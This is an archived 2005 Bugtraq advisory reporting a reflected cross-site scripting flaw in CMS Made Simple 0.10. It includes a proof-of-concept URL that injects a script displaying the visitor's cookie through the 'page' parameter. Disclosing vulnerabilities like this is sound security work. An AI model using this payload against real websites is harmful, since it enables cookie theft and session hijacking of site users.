CMS Made Simple 0.10 is susceptible to a cross site scripting attack.

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: CMS Made Simple 0.10 is susceptible to a cross site scripting attack.
From: X1ngBox@xxxxxxxxxxxxxxxxx, Gmail@xxxxxxxxxxxxxxxxx, COM@xxxxxxxxxxxxxxxxx
Date: 26 Sep 2005 08:38:05 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

[Description]: CMS lets you update your pages and keep the content on a static 
page that will
                not become stale regardless of how much other content gets 
placed on your site


[version]:CMS Made Simple 0.10

[vendor]:http://www.cmsmadesimple.org

[Vulnerability]: cross site script

[exploit]:
http://[host]/[cms]/index.php?page=<script>alert(document.cookie);</script>
 
.......[X1NG]..........
X1ngBox <at/> Gmail Com

Prev by Date: FreeBSD GNU Mailutils 0.6 imap4d exploit
Next by Date: RealPlayer && HelixPlayer Remote Format String Exploit
Previous by thread: FreeBSD GNU Mailutils 0.6 imap4d exploit
Next by thread: RealPlayer && HelixPlayer Remote Format String Exploit
Index(es):
- Date
- Thread